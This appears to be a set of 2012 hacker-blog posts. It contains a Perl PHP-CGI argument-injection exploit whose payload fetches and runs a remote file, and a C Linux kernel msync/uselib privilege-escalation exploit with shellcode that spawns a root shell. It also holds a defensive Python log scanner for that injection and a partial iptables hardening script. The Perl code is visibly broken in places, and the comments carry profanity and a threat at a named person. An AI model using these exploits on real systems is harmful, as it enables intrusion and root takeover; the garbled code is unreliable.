[Exploit Updated]: PHP CGI – executes a payload which is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so please don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec(),

which IS a PHP CGI function, and the ONLY way it will definitely exec!

ALSO this CAN execute cmds of course; I will add in a line if you wish to do this.. ok…

Ok, now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so please don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec(),

which IS a PHP CGI function, and the ONLY way it will definitely exec!

Ok, now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–
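The request both posts above build smuggles php-cgi switches through the query string, percent-encoding every '=' so the raw string contains none. The defensive check that follows from that is to flag any request whose raw query string has no '=' but decodes to text beginning with '-' (the same condition the published rewrite-rule mitigation tests for). This is an added example, not xd's code; the access log lines, addresses and the names `SAMPLE_ACCESS_LOG`, `is_php_cgi_arg_injection` and `scan_access_log` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log lines (sample data, not from the post).
# Line 1 has the shape of the request the post's script builds: the query string
# carries php-cgi switches, with '=' percent-encoded so the raw string has no '='.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [06/May/2012:12:00:01 +0000] "POST //cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://203.0.113.7/p.txt HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [06/May/2012:12:00:02 +0000] "GET /index.php?-s HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
198.51.100.2 - - [06/May/2012:12:00:03 +0000] "GET /index.php?page=-d HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.9 - - [06/May/2012:12:00:04 +0000] "GET /search.php?q=hello+world HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)
# '-d name=value' pairs after decoding: the php.ini directives the request tries to force.
DIRECTIVE_RE = re.compile(r"-d\s*([A-Za-z_.]+)=(\S*)")


def is_php_cgi_arg_injection(raw_query: str) -> bool:
    """True when a raw query string would reach php-cgi as command-line switches.

    Per the CGI spec a query string with no unencoded '=' is passed to the script
    as argv, so the attacker encodes '=' as %3D. After decoding, a leading '-'
    marks a switch. This mirrors the published mitigation (refuse the request
    when the query string has no '=' and contains '-' or '%2d').
    """
    if not raw_query or "=" in raw_query:
        return False
    decoded = unquote_plus(raw_query)
    return decoded.lstrip().startswith("-")


def scan_access_log(text: str) -> list:
    """Return one finding per request whose query string looks like a php-cgi switch injection."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        path, _, raw_query = m.group("target").partition("?")
        if not is_php_cgi_arg_injection(raw_query):
            continue
        decoded = unquote_plus(raw_query)
        findings.append({
            "src": m.group("src"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "path": path,
            "decoded_query": decoded,
            # which ini settings the request tried to force (empty for a bare '-s')
            "directives": dict(DIRECTIVE_RE.findall(decoded)),
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['src']} {f['method']} {f['path']} -> {f['decoded_query']!r} {f['directives']}")
```

Only the two requests from 203.0.113.7 are reported; `page=-d` carries a literal '=' and is ordinary form data.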

[Exploiting Linux code]: Modified version … yea, a bit old BUT working on FC ;) have fun… thx to sd for this, but, added Tifflib in this… so, have a play…

Posted on 25th April 2012 in Android, Codes, Exploits, Papers, Uncategorized

This code rocks as it is based on the bugs within fsync/fasync..msync.. Now, I have changed things to suit MY tests, but.. it is very much nice and, well, on RHEL4-5 it is still OK … enjoy!

Thanks to sd, AB and others for the help on this mod..


/* Fedora4 exploit in msync() - still work in progress but it will exploit... */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <linux/elf.h>

#define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */
#define ltime unsigned long long
#define MEMSZ (70*1024*1024)
#define MAGIC -123
unsigned char shellcode[] =

"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";

static ltime gtime() {
struct timeval tv;
gettimeofday(&tv, NULL);
return tv.tv_sec * 1000000 + tv.tv_usec;
}

ltime lt;

static void time_start() {
lt = gtime();
}

static void time_end() {
printf("took %lu microseconds\n", gtime() - lt);
}

void core_stat() {
int s;
char buf[512];
char incore;
unsigned long last = 0;
FILE *f;

sprintf(buf, "/proc/%d/maps", getpid());
f = fopen(buf, "rt");
while (fgets(buf, 512, f)) {
unsigned int from, to;
unsigned int i;
if (sscanf(buf, "%x-%x", &from, &to) < 2)
break;
for (i = from; i < to; i += PAGE_SIZE) {
mincore((void *) i, PAGE_SIZE, &incore);
if (incore) {
r:;
if (!last) {
printf("in core 0x%08x-", i);
s = last = i;
continue;
}
if (last + PAGE_SIZE == i) {
last = i;
continue;
}
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
goto r;
}
if (!last)
continue;
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
}
}
fclose(f);
}
#define SWAPFILE "TTswap"
#define EATFILES "TTeatfiles"
#define EATFILE "TTeatfile"
#define SHAREFILE "TTsharefile"
#define DUMMYFILE "TTdummyfile"
#define EATTIME 10
#define LIBFILE "TTlib"

/* number of vma struct fill */
#define VMAFILL 15000
/* how much pages to sync - 2 is enough */
#define NSYNC 2
#define BASE (char *) 0x60000000
#define DBASE (char *) 0x80001000
#define EPAGE (char *) 0x80000000
#define MAPSTEP 64 * 4096
#if 1
#define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); }
#else
#define DEBUG(x...)
#endif
#define sendsig(pid) kill(pid, SIGUSR1)
#define wait4sig() { while (!gotsig) pause(); gotsig = 0; }
#define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1))
#define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1))

#undef O_DIRECT
#define O_DIRECT 0

struct libimg {
Elf32_Ehdr elf;
Elf32_Phdr ph;
};
struct dentry_struct {
unsigned dummy0, dummy1;
void *inode1, *inode2;
};
struct file_struct {
struct file_struct *next, *prev;
void *dentry;
void *mnt;
void *op;
void *f_mapping[64];
};
struct vma_struct {
void *mm;
unsigned long vm_start;
unsigned long vm_end;
struct vma_struct *vm_next;
unsigned long pgprot;
unsigned long vmflags;
char rb[16];
void *shared_next, *shared_prev;
void *vm_ops;
unsigned long pgoff;
void *file;
void *priv;
};
struct mm_struct {
struct vma_struct *mmap;
void *rb;
struct vma_struct *cache;
void *pgd1;
void *pgd2;
void *pgd3;
unsigned long locks[32];
};
struct libimg limg = {
{
e_ident: "\177ELF",
e_type: ET_EXEC,
e_machine: EM_386,
e_phoff: sizeof(Elf32_Ehdr),
e_ehsize: sizeof(Elf32_Ehdr),
e_phentsize: sizeof(Elf32_Phdr),
e_phnum: 1
},
{
p_type: PT_LOAD,
p_vaddr: 0,
p_memsz: 0
}
};

static void make_lib(char *name) {
int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700);
write(libfd, &limg, sizeof(limg));
fchmod(libfd, 0700);
}
static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;
#define cleanup() _cleanup(__func__, __LINE__)
void killall() {
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}

void _cleanup(const char *name, int line) {
printf("cleanup called! from %s:%d\n", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}
#define FAKES_BASE 0x50000000

struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};
struct fakes *fakes = (void *) FAKES_BASE;
void build_fakevma() {
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
memset(fakes->pgd, 0, sizeof(fakes->pgd));
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}

void create_fakepage(void *buf) {
int i;
void *vma = &fakes->vma;
void **p = buf;
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma;
}
static void sighand(int d) {
gotsig = 1;
}

static int thread(void *d) {
int t3;
int ret;
int i;
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap2 back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap2(swapmem + PAGE_SIZE * 2, PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE,PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");

setuid(0);

setresgid(0);
execl("/bin/sh", "/bin/sh", "-i", NULL);  // bit better now :P
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[]) {
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd, further research by sd and now xd\nthis is development-in-progress code\n=============================================\n");
signal(SIGUSR1, sighand);
signal(SIGALRM, sighand);
setbuf(stdout, NULL);
i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
mmap2(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC,MAP_SHARED, i,0);
ftruncate(i, PAGE_ALIGN(sizeof(*fakes)));
build_fakevma();
t4 = fork();
if (!t4) {
while (1) {
fakes->t1++;
fakes->t2++;
sched_yield();
}
}
printf("creating page\n");
create_fakepage(buf);
i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(i, MAPSTEP);
write(i, buf, MAPSTEP);
for (n = 0; n < MEMSZ; n += MAPSTEP)
mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0);
fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd3, 16384);
fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777);
alarm(EATTIME);
printf("done fakepage\n");
do {
int c;
c = write(fd1, buf, MAPSTEP);
if (c < MAPSTEP)
break;
bigsize += c;
printf("done %d Kb\r", bigsize / 1024);
} while (!gotsig);
printf("\n");
alarm(0);
gotsig = 0;
bigmem = mmap2(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_SHARED, fd1, 0);  // ye i changed this to mmap2() (xd) ...go figure
if (bigmem == MAP_FAILED)
cleanup();
t3 = fork();
if (!t3) {
wait4sig();
printf("starting aggresive write!\n");
write(fd3, bigmem, bigsize);
printf("done aggresive write!\n");
_exit(0);
}
t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 0xf00, NULL);
swapmem = base;
if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) == MAP_FAILED) cleanup();
printf("creating swapfile\n");
fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd2, MEMSZ);
vmamem = swapmem + MEMSZ + 16*PAGE_SIZE;
printf("vmamem = %p\n", vmamem);
mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_FIXED, fd2, 0);
printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE);
write(fd2, dummy, MEMSZ);
close(fd2);
printf("unlink\n");
unlink(SWAPFILE);
build_fakevma();
sendsig(t2);
limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE;
limg.ph.p_memsz = PAGE_SIZE * 2;
make_lib(LIBFILE);
printf("started uselib\n");
time_start();
uselib(LIBFILE);
time_end();
printf("uselib finished!\n");
sem = 1;
printf("pid %d\n",getpid());
n = 0;
n = waitpid(t2, NULL, __WCLONE);
printf("waitpid got %d/%d\n", n, errno);
cleanup();
}

 

enjoy!

xd / freelance coder

IPTABLES/IP6TABLES KUSTOMISED SETTINGS TO REJECT DoS , BOTH PROTOCOLS! (LINUX)

Posted on 25th April 2012 in Codes, Exploits, Papers, Uncategorized

MY KUSTOM FIREWALL, ENJOY! SINCE MIGRATING TO BSD, I HAVE LET IPTABLES GO F**K ITSELF A BIT, BUT HERE ANYHOW.. ENJOY SOME PROTECTION EH.. DONATE TO FUCKING HELP ME PAY MY LAWYER FOR CHRIST'S SAKE, I WON'T LAST MUCH DAMN LONGER WITHOUT IT! LOL, YES I'M A BUM AND BROKE, I'M SPONSORED BY MY GOVERNMENT'S SS :p SO FUCKING LIKE WHAT YOU'RE GETTING, COZ I DON'T REALLY HAVE TO GIVE SHIT, JUST REMEMBER THAT.

HERE.


#!/bin/sh
# Loopback interface
LO_IF="lo"
# Network card connected to Internet
NET_IF="eth1"
# DMZ interface, if any
DMZ_IF=""

# iptables executables
IPTABLES="/sbin/iptables"
IP6TABLES="/sbin/ip6tables"

# Set this to 1 if you want enable IPv4 port forwarding
IPV4_FORWARDING=""
# 99% you don't need IPv6 at all, so, disable it
DISALLOW_IPV6="1"

# Ports that you want to be explicitly disabled
PORTS_TO_DISABLE="113"
# TCP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
TCP_PORTS_INCOMING_ALLOW="21 631 6667 7000 2222 80 443"
TCP_PORTS_OUTGOING_ALLOW="21 631 6667 7000 2222 80 443"
# UDP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
UDP_PORTS_INCOMING_ALLOW="53"
UDP_PORTS_OUTGOING_ALLOW="53"
# Block IPs trying to make too many connections on given ports
# If you have Entropy connecting, do not set this!
# Of course timed ports here have to be set in the variables above too.
# It will work for both tcp and udp.
TIMED_PORTS=""
# Number of times ip is allowed to bug port
TIMED_PORTS_HIT_COUNT="5"
# Number of seconds the ban will last and also the amount of time
# within user can at most try to connect TIMED_PORTS_HIT_COUNT times
TIMED_PORTS_TIMER_SECS="300"

# =========================
# PORT SETTINGS ABOVE =====
# =========================

# Allow sane ICMP packets (ping, traceroute) (DoS)
# set this to 1 if you want it, or leave unset
ALLOW_SANE_ICMP="1"
# Completely disable ICMP instead? (DoS)
# set this to 1 if you want it, or leave unset
FUCK_ICMP_I_DONT_NEED_IT=""
# Number of allowed ICMP packets per second (this is a further filter) (DoS)
ICMP_PACKETS_PER_SECOND="1"
# Also rate limit RST Packets, to mitigate SMURF attacks (DoS)
RST_PACKETS_PER_SECOND="2"

# Kill identd?
# set this to 1 if you want it, or leave unset
KILL_IDENTD="1"
# Kill port scanning? If you set this to 1, please also set
# a port to monitor against port scans (I suggest 139, trust me, it's fine for ssh too)
# IP will be blocked for PORT_SCANNING_SECONDS (1 day)
KILL_PORT_SCANNING="1"
PORT_SCANNING_PORT="139"
PORT_SCANNING_SECONDS="86400"
# Enable IP spoofing protection? (DoS)
IP_SPOOFING_PROTECTION="1"
# Enable kernel SYN flood protection? (DoS)
SYN_FLOOD_PROTECTION="1"
# Max SYN backlog on TCP
TCP_MAX_SYN_BACKLOG="1024"
# Set the tcp-time-wait buckets pool size
TCP_MAX_TW_BUCKETS="1440000"
# Ignore ICMP broadcasts anyway? (DoS)
IGNORE_ICMP_BROADCASTS="1"
# Log packets with impossible addresses?
LOG_MARTIAN_IPS="1"
# Disallow ICMP redirects? (DoS)
DISALLOW_ICMP_REDIRECTS="1"
# Disallow source routed packets? (DoS)
DISALLOW_SOURCE_ROUTED_PACKETS="1"
# Disallow multicast routing? (DoS)
#DISALLOW_MULTICAST_ROUTING="1"
# Disallow proxy_arp?
DISALLOW_PROXY_ARP="1"
# Disallow bootp relay?
DISALLOW_BOOTP_RELAY="1"
# Enable secure redirects (only accept ICMP redirects for
# gateways. Helps against MITM attacks.
ENABLE_SECURE_ICMP_REDIRECTS="1"

# Decrease the time default value for tcp_fin_timeout connection
TCP_FIN_TIMEOUT="15"
# Decrease the time default value for tcp_keepalive_time connection
TCP_KEEPALIVE_TIME="1800"
# Handle TCP window scaling, disable by default
DISALLOW_TCP_WINDOW_SCALING=""
# Turn off TCP timestamp feature
TCP_TIMESTAMP="0"

# Drop traffic from IANA-reserved IPs.
DROP_IANA_IPS="1"
# Completely ignore Microsuck ports
IGNORE_MICROSOFT_SHIT="1"

# General default logging rate limit parameters
RLIMIT="-m limit --limit 3/s --limit-burst 8"
# General default logging parameters
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="${LOG} --log-ip-options"

# set this to a valid path containing your custom iptables rules
# it will be sourced
CUSTOM_RULES_FILE_PRE=""
CUSTOM_RULES_FILE_POST=""

####
#### stay away from here.
####

if [ -z "${NET_IF}" ]; then
echo "set NET_IF"
exit 1
fi
if [ ! -x "${IPTABLES}" ]; then
echo "set IPTABLES"
exit 1
fi
if [ ! -x "${IP6TABLES}" ]; then
echo "set IP6TABLES"
exit 1
fi

# drop everything by default
"${IPTABLES}" -P INPUT DROP
"${IPTABLES}" -P FORWARD DROP
"${IPTABLES}" -P OUTPUT DROP

# Set the nat/mangle/raw tables' chains to ACCEPT
"${IPTABLES}" -t nat -P PREROUTING ACCEPT
"${IPTABLES}" -t nat -P OUTPUT ACCEPT
"${IPTABLES}" -t nat -P POSTROUTING ACCEPT

"${IPTABLES}" -t mangle -P PREROUTING ACCEPT
"${IPTABLES}" -t mangle -P INPUT ACCEPT
"${IPTABLES}" -t mangle -P FORWARD ACCEPT
"${IPTABLES}" -t mangle -P OUTPUT ACCEPT
"${IPTABLES}" -t mangle -P POSTROUTING ACCEPT

# clear previous rules
"${IPTABLES}" -F
"${IPTABLES}" -t nat -F
"${IPTABLES}" -t mangle -F
"${IPTABLES}" -X
"${IPTABLES}" -t nat -X
"${IPTABLES}" -t mangle -X
"${IPTABLES}" -Z
"${IPTABLES}" -t nat -Z
"${IPTABLES}" -t mangle -Z

if [ -n "${DISALLOW_IPV6}" ]; then
"${IP6TABLES}" -P INPUT DROP
"${IP6TABLES}" -P FORWARD DROP
"${IP6TABLES}" -P OUTPUT DROP
# The mangle table can pass everything
"${IP6TABLES}" -t mangle -P PREROUTING ACCEPT
"${IP6TABLES}" -t mangle -P INPUT ACCEPT
"${IP6TABLES}" -t mangle -P FORWARD ACCEPT
"${IP6TABLES}" -t mangle -P OUTPUT ACCEPT
"${IP6TABLES}" -t mangle -P POSTROUTING ACCEPT
# Delete all rules.
"${IP6TABLES}" -F
"${IP6TABLES}" -t mangle -F
# Delete all chains.
"${IP6TABLES}" -X
"${IP6TABLES}" -t mangle -X
# Zero all packets and counters.
"${IP6TABLES}" -Z
"${IP6TABLES}" -t mangle -Z

fi

if [ -f "${CUSTOM_RULES_FILE_PRE}" ]; then
# '.' is the POSIX sh spelling of source; 'source' is a bashism and fails under /bin/sh
. "${CUSTOM_RULES_FILE_PRE}"
fi

# setup ipv4 forwarding
ip_forward="0"
if [ -n "${IPV4_FORWARDING}" ]; then
ip_forward="1"
fi
echo "Setting ip_forward to ${ip_forward}"
echo ${ip_forward} > /proc/sys/net/ipv4/ip_forward

# ip spoofing protection
ip_spoof="0"
if [ -n "${IP_SPOOFING_PROTECTION}" ]; then
ip_spoof="1"
fi
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo "Setting ip spoofing protection on ${i} to ${ip_spoof}"
echo ${ip_spoof} > ${i}
done

# syn flood attacks
syn_flood="0"
if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
syn_flood="1"
fi
echo "Setting SYN flood protection on to ${syn_flood}"
echo ${syn_flood} > /proc/sys/net/ipv4/tcp_syncookies
echo "Setting tcp_max_syn_backlog to ${TCP_MAX_SYN_BACKLOG}"
echo "${TCP_MAX_SYN_BACKLOG}" > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo "Setting tcp_max_tw_buckets to ${TCP_MAX_TW_BUCKETS}"
echo "${TCP_MAX_TW_BUCKETS}" > /proc/sys/net/ipv4/tcp_max_tw_buckets

log_from_mars="0"
if [ -n "${LOG_MARTIAN_IPS}" ]; then
log_from_mars="1"
fi
for i in /proc/sys/net/ipv4/conf/*/log_martians; do
echo "Setting martian sources logging on ${i} to ${log_from_mars}"
echo ${log_from_mars} > ${i}
done

# don't log invalid responses to broadcast
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

# don't accept or send ICMP redirects.
icmp_redir="1"
if [ -n "${DISALLOW_ICMP_REDIRECTS}" ]; then
icmp_redir="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do
echo "Setting ICMP redirection acceptance on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do
echo "Setting ICMP redirection send on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done

# don't accept source routed packets.
sr_pack="1"
